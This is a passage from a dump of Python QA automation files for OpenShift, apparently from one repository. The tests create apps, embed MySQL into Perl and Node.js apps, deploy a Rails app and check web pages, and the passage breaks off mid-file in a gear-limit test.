"/automation/open/testmodules/UI/web/case_147640.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_147640.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Check_wiki_page(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Check wiki page\n web.go_to_community()\n time.sleep(5)\n web.click_element_by_link_text(\"Open Source\")\n time.sleep(5)\n web.click_element_by_link_text(\"Index\")\n time.sleep(5)\n web.check_title(\"Wiki Index | OpenShift by Red Hat\") \n \n self.tearDown()\n\n return self.passed(\"Case 147640 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Check_wiki_page)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_147640.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6694214940071106, "alphanum_fraction": 0.671192467212677, "avg_line_length": 34.29166793823242, "blob_id": "77e435940e4b095cc19c3ce064ad6da4c3064271", "content_id": "98e58469c31efb96890f99959cf1d4598ae4b246", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1694, "license_type": "no_license", "max_line_length": 103, "num_lines": 48, "path": "/automation/open/testmodules/RT/quick_start/quick_start_nodejs_custom_version.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartNodeJSCustomVersion(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"nodejs\"]\n self.config.application_nodejs_custom_version = \"0.9.1\"\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: NodeJS Custom Version\"\n self.config.git_upstream_url = \"git://github.com/openshift/nodejs-custom-version-openshift.git\"\n self.config.page = \"env\"\n self.config.page_pattern = \"Version: v\" + self.config.application_nodejs_custom_version\n\n def post_configuration_steps(self):\n self.log_info(\"Post Configuration Steps\")\n marker = open(\"./%s/.openshift/markers/NODEJS_VERSION\" % self.config.application_name, \"w\")\n marker.write(self.config.application_nodejs_custom_version)\n marker.close()\n\n def pre_deployment_steps(self):\n self.log_info(\"Pre Deployment Steps\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git commit -a -m NODEJS_VERSION\"\n ]\n return common.command_get_status(\" && \".join(steps))\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartNodeJSCustomVersion)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6553381681442261, "alphanum_fraction": 0.6594576239585876, "avg_line_length": 31, "blob_id": "eb5f66a1ffa4e09b5d2a6bf1156fea95be4f79da", "content_id": "6abbfdd1285449c2edae1b3b52a43980b00a4270", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2913, "license_type": "no_license", "max_line_length": 79, "num_lines": 91, "path": "/automation/robot_to_testlink/RF-Template/run-test.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n'''Selenium Library Demo Runner\n\nUsage: rundemo.py [options] datasource\n\nThis script starts necessary helper programs (a simple HTTP server and Selenium\nserver) and executes the given test case file/directory. After test cases have\nfinished executing, the helper programs are shut down.\n\nOptions are passed to Robot Framework as they are given, for a complete list\nof options, run 'pybot --help'.\n\nBy default, tests are executed with Firefox browser, this can be changed by\nusing command line option '--variable', eg. '--variable BROWSER:ie'. Selenium\nLibrary documentation lists the accepted values of browser.\n\nThe speed of the test execution can be slowed by defining a non-zero value for\nvariable delay, eg. '--variable DELAY:2'\n\nFor debugging purposes, the output of Selenium server is written in\n'selenium_log.txt' under the 'reports' directory.\n\nRequires that Robot Framework, Selenium Library, Python 2.4 or newer and\nJava 1.5 or newer are installed.\n'''\n\nimport os\nimport sys\nimport time\nimport tempfile\nfrom subprocess import Popen, call, STDOUT\nfrom time import strftime\nimport ConfigParser\n\nimport SeleniumLibrary\nfrom SeleniumLibrary import selenium\n\nINSTPATH = os.path.split(os.path.abspath(SeleniumLibrary.__file__))[0]\nTMPFILE = tempfile.TemporaryFile()\nCURRENTTIME = strftime(\"%Y-%m-%d_%H%M%S\")\nREPORTDIR = 'Reports_' + CURRENTTIME\nif not os.path.exists(REPORTDIR):\n os.mkdir(REPORTDIR)\n\nSELENIUM_LOG_FILE = open(os.path.join(REPORTDIR, 'selenium_log.txt'), 'w')\nDEFAULT_ARGS = [\n'--outputdir', REPORTDIR,\n'--log', 'Logs.html',\n'--report', 'Report.html',\n'--summary', 'Summary.html',\n'--debugfile', 'Debug.txt',\n'--output', 'Output.xml',\n'--reporttitle', 'Selenium_Report',\n'--logtitle', 'Selenium_Log']\n\ndef run_demo(cmdline_args):\n shell = (os.sep == '\\\\')\n call(['pybot'] + DEFAULT_ARGS + cmdline_args, shell=shell)\n print 'Selenium log:', os.path.abspath(SELENIUM_LOG_FILE.name)\n\ndef read_cfg():\n #read config file\n filename = 'testconfig.ini'\n cp = ConfigParser.ConfigParser()\n x = cp.read(filename)\n sections = cp.sections()\n for parameter in sections:\n value = cp.options(parameter)\n items = cp.items(parameter)\n for x in items:\n variable_name = x[0]\n variable_value = x[1]\n final_value = variable_name+':'+variable_value\n option = '--variable'\n DEFAULT_ARGS.append(option)\n DEFAULT_ARGS.append(final_value)\n\nif __name__ == '__main__':\n read_cfg()\n print \"-----------------------------------------------------------\"\n print \"The following parameters have been passed: \"\n print DEFAULT_ARGS\n print \"-----------------------------------------------------------\"\n if len(sys.argv) < 2 or '--help' in sys.argv[1]:\n print __doc__\n sys.exit(1)\n run_demo(sys.argv[1:])\n\n SELENIUM_LOG_FILE.close()\n TMPFILE.close()\n\n" }, { "alpha_fraction": 0.6121483445167542, "alphanum_fraction": 0.6228528618812561, "avg_line_length": 34.85714340209961, "blob_id": "b96e03d433dca9ac6bbaf6dcd8c92f5a522b331d", "content_id": "a92cc8ab3eec71c13f1f8d8cdc7d57be8fb09e99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4017, "license_type": "no_license", "max_line_length": 136, "num_lines": 112, "path": "/automation/open/testmodules/RT/cartridge/rack_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]Rack / Rails Framework Support\nhttps://tcms.engineering.redhat.com/case/122285/\n\"\"\"\nimport os,sys,re,time,stat\nimport testcase,common,OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]Rack / Rails Framework Support\"\n self.app_name = \"rackframework\"\n self.app_type = common.app_types[\"rack\"]\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n tcms_testcase_id=122285\n self.deploy_rails_file = \"%s/deploy_rails_app.sh\" % (self.git_repo)\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass RackFrameworkSupport(OpenShiftTest): \n\n def create_script(self):\n context = \"\"\"#!/bin/sh\nset -x \nrails new %s -f\ncd %s \necho \"gem 'execjs'\" >>Gemfile\necho \"gem 'therubyracer'\" >>Gemfile\nbundle install\nrails generate controller home index\necho '<h1>Hello, Rails</h1>' >> app/views/home/index.html.erb\nrm -rf public/index.html\nsed -i '5 iroot :to => \"home#index\"' config/routes.rb\nsed -i -E 's/config.assets.compile = false/config.assets.compile = true/g' config/environments/production.rb\nbundle install --deployment\ngit add . && git add -f .bundle && git commit -m \"test\" && git push\"\"\" %(self.git_repo, self.git_repo)\n try:\n f = open(self.deploy_rails_file, 'w')\n f.write(context)\n f.close()\n os.chmod(self.deploy_rails_file, 0777)\n except Exception as e:\n self.info(\"Failed to create deploy_rails_app.sh under local git repo: %s\"%str(e))\n return 1\n\n self.info(\"Successfully created deploy_rails_app.sh under local git repo\")\n return 0\n\n\n def test_method(self):\n # 1.Create an app\n self.steps_list.append(testcase.TestCaseStep(\"1. Create an rack app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n \n # 2.Create deploy_rails_app.sh under local git repo\n self.steps_list.append(testcase.TestCaseStep(\"2.Create deploy_rails_app.sh under local git repo\",\n self.create_script,\n expect_description=\"Successfully created deploy_rails_app.sh under local git repo\",\n expect_return=0))\n\n # 3.Run deploy_rails_app.sh\n self.steps_list.append(testcase.TestCaseStep(\"3.Run deploy_rails_app.sh\",\n \"bash %s\" % (self.deploy_rails_file),\n expect_description=\"Script executed successfully\",\n expect_return=0))\n\n # 4.Check app via browser\n test_html = \"Hello, Rails\"\n self.steps_list.append(testcase.TestCaseStep(\"4.Check the app via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RackFrameworkSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6408054232597351, "alphanum_fraction": 0.6467278599739075, "avg_line_length": 25.170541763305664, "blob_id": "5c3bb2223a2b9398863909ab92a745296f784b76", "content_id": "dd2cd7780d19d69cd44c347fcf504704b0848c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3377, "license_type": "no_license", "max_line_length": 78, "num_lines": 129, "path": "/automation/open/lib/dictlib.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# \n#\t Copyright (C) 1999-2004 Keith Dart <[email protected]>\n#\n#\t This library is free software; you can redistribute it and/or\n#\t modify it under the terms of the GNU Lesser General Public\n#\t License as published by the Free Software Foundation; either\n#\t version 2.1 of the License, or (at your option) any later version.\n#\n#\t This library is distributed in the hope that it will be useful,\n#\t but WITHOUT ANY WARRANTY; without even the implied warranty of\n#\t MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n#\t Lesser General Public License for more details.\n\n\"\"\"\nHelpers and tools for dictionary objects.\n\n\"\"\"\n\nclass AttrDictWrapper(object):\n\t\"\"\"Wraps any mapping object with the ability to get to its contents using\n\tattribute access syntax (dot). Note that you cannot have any contained keys\n\tthat match an attribute name.\"\"\"\n\tdef __init__(self, mapping=None):\n\t\tself.__dict__[\"_mapping\"] = mapping or {}\n\n\t# attribute-style access \n\tdef __getattribute__(self, key):\n\t\ttry:\n\t\t\treturn super(AttrDictWrapper, self).__getattribute__(key)\n\t\texcept AttributeError:\n\t\t\ttry:\n\t\t\t\treturn self.__dict__[\"_mapping\"].__getattribute__( key)\n\t\t\texcept AttributeError:\n\t\t\t\ttry:\n\t\t\t\t\tobj = self.__dict__[\"_mapping\"].__getitem__(key)\n\t\t\t\t\tif hasattr(obj, \"keys\"):\n\t\t\t\t\t\treturn self.__class__(obj) # wrap the returned mapping object also\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn obj\n\t\t\t\texcept KeyError, err:\n\t\t\t\t\traise AttributeError, \"no attribute or key '%s' found (%s).\" % (key, err)\n\n\tdef __setattr__(self, key, obj):\n\t\tif self.__class__.__dict__.has_key(key): # property access\n\t\t\tobject.__setattr__(self, key, obj)\n\t\telse:\n\t\t\treturn self.__dict__[\"_mapping\"].__setitem__(key, obj)\n\n\tdef __delattr__(self, key):\n\t\ttry: # to force handling of properties\n\t\t\tself.__dict__[\"_mapping\"].__delitem__(key)\n\t\texcept KeyError:\n\t\t\tobject.__delattr__(self, key)\n\n\tdef __getitem__(self, key):\n\t\tobj = self._mapping[key]\n\t\tif hasattr(obj, \"keys\"):\n\t\t\treturn self.__class__(obj) # wrap the returned mapping object also\n\t\telse:\n\t\t\treturn obj\n\n\tdef __delitem__(self, key):\n\t\tdel self._mapping[key]\n\n\tdef __setitem__(self, key, obj):\n\t\tself._mapping[key] = obj\n\n\t\nclass AttrDict(dict):\n\t\"\"\"A dictionary with attribute-style access. It maps attribute access to\n\tthe real dictionary. \"\"\"\n\tdef __init__(self, init={}):\n\t\tdict.__init__(self, init)\n\n\tdef __getstate__(self):\n\t\treturn self.__dict__.items()\n\n\tdef __setstate__(self, items):\n\t\tfor key, val in items:\n\t\t\tself.__dict__[key] = val\n\n\tdef __repr__(self):\n\t\treturn \"%s(%s)\" % (self.__class__.__name__, dict.__repr__(self))\n\n\tdef __setitem__(self, key, value):\n\t\treturn super(AttrDict, self).__setitem__(key, value)\n\n\tdef __getitem__(self, name):\n\t\treturn super(AttrDict, self).__getitem__(name)\n\n\tdef __delitem__(self, name):\n\t\treturn super(AttrDict, self).__delitem__(name)\n\n\t__getattr__ = __getitem__\n\t__setattr__ = __setitem__\n\n\tdef copy(self):\n\t\tch = AttrDict(self)\n\t\treturn ch\n\n\ndef _test(argv):\n\tld = {\"one\":1, \"two\":2, \"three\":3}\n\tgd = {\"gbone\":1, \"gbtwo\":2, \"gbthree\":3}\n\tlw = AttrDictWrapper(ld)\n\tlw.four = gd\n\tprint lw.one\n\tprint lw.two\n\tprint lw.four.gbone\n\tprint lw.four[\"gbtwo\"]\n\n\td = AttrDict()\n\td.one = \"one\"\n\tprint d\n\tprint d.get\n\tprint d.one\n\tprint d[\"one\"]\n\td[\"two\"] = 2\n\tprint d.two\n\tprint d[\"two\"]\n\n\n\nif __name__ == \"__main__\":\n\timport sys\n\t_test(sys.argv)\n\n" }, { "alpha_fraction": 0.6167749762535095, "alphanum_fraction": 0.6224614381790161, "avg_line_length": 39.024391174316406, "blob_id": "4e8e0b3585f6ecd03b4c268bae5a51fca978d844", "content_id": "7ca09645b31af78b41287034dad5284c8558d382", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4924, "license_type": "no_license", "max_line_length": 190, "num_lines": 123, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_perl.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nApr 05, 2012\n[rhc-cartridge] embed MySQL instance to PERL application\nhttps://tcms.engineering.redhat.com/case/122450/?from_plan=4962\n\"\"\"\nimport os\nimport sys\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_type = common.app_types[\"perl\"]\n self.app_name = \"perl\"+common.getRandomString(7)\n self.summary = \"[rhc-cartridge] embed MySQL instance to PERL application\"\n self.mysql_v = common.cartridge_types['mysql']\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysqlToPerl(OpenShiftTest):\n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(url+\"/mysql.pl\", 'Jeremy')\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a PERL app\", common.create_app, \n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n \n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql to the app\", \n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql cartridge should be embedded successfully\",\n expect_return=0))\n\n def add_page(app_name):\n new_page = \"\"\"#!/usr/bin/perl\nprint \"Content-type: text/plain\\\\r\\\\n\\\\r\\\\n\";\nprint \" \\n\";\nuse DBI;\nmy $dbname = $ENV{\"OPENSHIFT_APP_NAME\"};\nmy $location = $ENV{\"OPENSHIFT_MYSQL_DB_HOST\"};\nmy $port = $ENV{'OPENSHIFT_MYSQL_DB_PORT'};\nmy $database = \"DBI:mysql:$dbname:$location:$port\";\nmy $db_user = $ENV{\"OPENSHIFT_MYSQL_DB_USERNAME\"};\nmy $db_pass = $ENV{\"OPENSHIFT_MYSQL_DB_PASSWORD\"};\nmy $dbh = DBI->connect($database, $db_user, $db_pass) or die \"Cannot connect database\";\nmy $sth = $dbh->prepare(\"DROP TABLE IF EXISTS ucctalk\") or die $dbh->errstr;\n$sth->execute() or die \"Cannot execute SQL command:$dbh->errstr\";\nmy $sth = $dbh->prepare(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\") or die $dbh->errstr;\n$sth->execute() or die \"Cannot execute SQL command:$dbh->errstr\";\nmy $sth = $dbh->prepare(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\") or die $dbh->errstr;\n$sth->execute() or die \"Cannot execute SQL command:$dbh->errstr\";\nmy $sth = $dbh->prepare(\"SELECT * FROM ucctalk\") or die $dbh->errstr;\n$sth->execute() or die \"Cannot execute SQL command:$dbh->errstr\";\nwhile (@ary = $sth->fetchrow_array())\n{\n print join(\", \",@ary),\"\\n\";\n}\n$sth->finish();\n$dbh->disconnect;\"\"\"\n new_filename = \"mysql.pl\"\n f = open(\"%s/perl/%s\"%(self.app_name, new_filename), \"w\")\n f.write(new_page)\n f.close()\n cmd = \"cd %s; git add perl/%s && git commit -a -m 'changes' && git push\"%(self.app_name, new_filename)\n (status, output) = common.command_getstatusoutput(cmd)\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a page which does some operation with mysql database like mysql.pl:\",\n add_page,\n function_parameters=[self.app_name],\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify the MySQL functionality...\",\n self.verify,\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove embedded mysql from the app\", \n common.embed,\n function_parameters=[self.app_name, \"remove-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql should be removed successfully\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysqlToPerl)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7152777910232544, "alphanum_fraction": 0.7152777910232544, "avg_line_length": 16.625, "blob_id": "ba9c87fa01a915f1a1926b0b296c1fc50d2f9084", "content_id": "18349b0aadfc2c8f27582e0d2aa03b804dd52a48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 21, "num_lines": 8, "path": "/automation/open/lib/common/__init__.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom consts import *\nfrom misc import *\nfrom client import *\nfrom rest import *\nfrom admin import *\nfrom web import *\n\n\n\n" }, { "alpha_fraction": 0.5639856457710266, "alphanum_fraction": 0.5805693864822388, "avg_line_length": 32.49536895751953, "blob_id": "90cc9bf6bb2d69bda1bf8796c42b448960dd26c3", "content_id": "cce247eb1781b3bc00c422226cee0dd23bebf5b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7236, "license_type": "no_license", "max_line_length": 164, "num_lines": 216, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_nodejs.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: nodejs_mysql.py\n# Date: 2012/03/02 11:59\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport testcase, common, OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US590][runtime][rhc-cartridge]Embed MySQL instance to nodejs application\"\n self.app_name = 'nodejs1'\n self.app_type = 'nodejs'\n self.tcms_testcase_id = 137748\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass NodejsMysqlSupport(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a Node.js\",\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Embed with MySQL\" ,\n common.embed,\n function_parameters = [self.app_name, 'add-%s'%common.cartridge_types['mysql'],self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n def upload_server(app_name):\n mysql = OSConf.get_apps()[app_name]['embed'][common.cartridge_types['mysql']]\n try:\n f = open('%s/server.js'%app_name,'w')\n f.write('''#!/bin/env node\n// OpenShift sample Node application\n\nvar express = require('express');\nvar fs = require('fs');\nvar mysql = require('mysql');\nvar client = mysql.createClient({\n user:'%s',\n password :'%s'\n});\nclient.host ='%s';\nclient.port = %s;\nclient.database = '%s';\n\n// Local cache for static content [fixed and loaded at startup]\nvar zcache = { 'index.html': '' };\nzcache['index.html'] = fs.readFileSync('./index.html'); // Cache index.html\n\n// Create \"express\" server.\nvar app = express.createServer();\n\n\n/* ===================================================================== */\n/* Setup route handlers. */\n/* ===================================================================== */\n\n// Handler for GET /health\napp.get('/health', function(req, res){\n res.send('1');\n});\n\n// Handler for GET /asciimo\napp.get('/asciimo', function(req, res){\n var link=\"https://a248.e.akamai.net/assets.github.com/img/d84f00f173afcf3bc81b4fad855e39838b23d8ff/687474703a2f2f696d6775722e636f6d2f6b6d626a422e706e67\";\n res.send(\"<html><body><img src='\" + link + \"'></body></html>\");\n});\n\n// Handler for GET /\napp.get('/', function(req, res){\n res.send(zcache['index.html'], {'Content-Type': 'text/html'});\n});\n// Handler for GET /data1.js\napp.get('/data1.js', function(req, res){\n client.query(\"DROP TABLE IF EXISTS info\");\n client.query(\"CREATE TABLE info(id INT PRIMARY KEY, data VARCHAR(20))\");\n client.query(\"INSERT INTO info VALUES(1, '#OPENSHIFT_1#')\");\n //client.end();\n res.send('Please visit /show.js to see the data', {'Content-Type': 'text/plain'});\n});\n// Handler for GET /data2.js\napp.get('/data2.js', function(req, res){\n client.query(\"DROP TABLE IF EXISTS info\");\n client.query(\"CREATE TABLE info(id INT PRIMARY KEY, data VARCHAR(20))\");\n client.query(\"INSERT INTO info VALUES(1, '#OPENSHIFT_2#')\");\n //client.end();\n res.send('Please visit /show.js to see the data', {'Content-Type': 'text/plain'});\n});\n// Handler for GET /show.js\napp.get('/show.js', function(req, res){\n client.query(\n 'SELECT data FROM info',\n function selectCb(err, results, fields) {\n if (err) {\n res.send('Failed to get data from database', {'Content-Type': 'text/plain'});\n throw err;\n }\n else {\n res.send(results[0]['data'], {'Content-Type': 'text/plain'});\n }\n }\n );\n //client.end();\n});\n\n\n// Get the environment variables we need.\nvar ipaddr = process.env.OPENSHIFT_INTERNAL_IP;\nvar port = process.env.OPENSHIFT_INTERNAL_PORT || 8080;\n\nif (typeof ipaddr === \"undefined\") {\n console.warn('No OPENSHIFT_INTERNAL_IP environment variable');\n}\n\n// terminator === the termination handler.\nfunction terminator(sig) {\n if (typeof sig === \"string\") {\n console.log('%%s: Received %%s - terminating Node server ...',\n Date(Date.now()), sig);\n process.exit(1);\n }\n console.log('%%s: Node server stopped.', Date(Date.now()) );\n}\n\n// Process on exit and signals.\nprocess.on('exit', function() { terminator(); });\n\n['SIGHUP', 'SIGINT', 'SIGQUIT', 'SIGILL', 'SIGTRAP', 'SIGABRT', 'SIGBUS',\n 'SIGFPE', 'SIGUSR1', 'SIGSEGV', 'SIGUSR2', 'SIGPIPE', 'SIGTERM'\n].forEach(function(element, index, array) {\n process.on(element, function() { terminator(element); });\n});\n\n// And start the app on that interface (and port).\napp.listen(port, ipaddr, function() {\n console.log('%%s: Node server started on %%s:%%d ...', Date(Date.now() ), ipaddr, port);\n});'''%(mysql['username'], mysql['password'], mysql['url'], mysql['port'], mysql['database']))\n\n f.close()\n command = '''cd %s && \n chmod +x server.js &&\n git add server.js &&\n git commit -m \"Added server.js\" -a &&\n git push'''%app_name\n\n (status, output) = common.command_getstatusoutput(command)\n\n except Exception as e:\n self.info(\"ERROR: %s\"%str(e))\n return 255\n\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\"Add server.js file\" ,\n upload_server,\n function_parameters = [self.app_name],\n expect_return=0))\n\n def verify(app_name):\n url = OSConf.get_app_url(app_name)\n r = common.grep_web_page(\"%s/data1.js\"%url, 'Please visit /show.js to see the data')\n r += common.grep_web_page(\"%s/show.js\"%url, 'OPENSHIFT_1')\n r += common.grep_web_page(\"%s/data2.js\"%url, 'Please visit /show.js to see the data')\n r += common.grep_web_page(\"%s/show.js\"%url, 'OPENSHIFT_2')\n return r\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify it the web output\" ,\n verify,\n function_parameters = [self.app_name],\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodejsMysqlSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of nodejs_mysql.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5439282655715942, "alphanum_fraction": 0.5747470259666443, "avg_line_length": 33.7760009765625, "blob_id": "4ac8b9c44cad70e31dad43a1b7eeba61171c0b2e", "content_id": "466bfa26e08446e59d4658006956f3acc8b845c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4348, "license_type": "no_license", "max_line_length": 169, "num_lines": 125, "path": "/automation/open/testmodules/RT/node/change_std_gear.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: change_std_gear.py\n# Date: 2012/02/24 07:55\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport re\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[rhc-node] [US1823] Change STD 'gear' to new standard\"\n self.app_name = common.getRandomString(10)\n self.res_limit_file = '/etc/openshift/resource_limits.conf.large'\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'jbossas'\n tcms_testcase_id = 135819\n self.steps = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass ChangeStdGear(OpenShiftTest):\n def test_method(self):\n\n '''self.steps.append(testcase.TestCaseStep(\"Verify the symlink to STD\",\n 'ls -l /etc/openshift/resource_limits.conf|grep std && echo PASS',\n expect_string_list = ['PASS'],\n expect_return = 0))\n '''\n\n self.steps.append(testcase.TestCaseStep(\"Create a app\",\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, False],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"Check the memory limits\",\n self.cgsnapshot,\n expect_description = \"Verify memory.limit_in_bytes=536870912 (512 MByte) & memory.memsw.limit_in_bytes = 641728512 (512 MByte + 100 MByte)\", \n expect_return=0))\n\n # Run the following command and in the output see the section 'group libra/<UUID>'\n\n self.steps.append(testcase.TestCaseStep(\"Create a app\",\n self.repquota,\n expect_description = \"Hard block limit for given user should be 1048576 (1GB)\",\n expect_return=0))\n \n\n # Verify the file /etc/openshift/resource_limits.conf.large \n\n 